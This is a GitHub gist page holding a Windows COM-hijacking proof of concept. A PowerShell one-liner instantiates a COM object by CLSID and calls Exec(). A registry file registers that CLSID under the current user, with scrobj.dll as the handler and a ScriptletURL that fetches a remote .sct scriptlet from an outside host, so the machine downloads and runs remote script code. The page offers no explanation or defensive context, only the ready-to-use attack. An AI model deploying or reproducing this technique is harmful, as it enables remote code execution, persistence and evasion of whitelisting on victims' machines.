Skip to content

Instantly share code, notes, and snippets.

@homjxi0e homjxi0e/COMHijacking18.reg Secret
Last active May 8, 2018

Embed
What would you like to do?
$COMobj = [activator]::CreateInstance([type]::GetTypeFromCLSID("{00020000-0000-0000-C000-000000000046}"));$COMobj.Exec();
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00020000-0000-0000-C000-000000000046}]
@="Bandit"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00020000-0000-0000-C000-000000000046}\InprocServer32]
@="C:\\WINDOWS\\system32\\scrobj.dll"
"ThreadingModel"="Apartment"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00020000-0000-0000-C000-000000000046}\ProgID]
@="Bandit"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00020000-0000-0000-C000-000000000046}\ScriptletURL]
@="https://gist.githubusercontent.com/homjxi0e/3e4488789a6b9222e445a68d29962518/raw/a167f0f680b446be17fa6a898b865b0056dfb072/COMobj.sct"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00020000-0000-0000-C000-000000000046}\VersionIndependentProgID]
@="Bandit"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.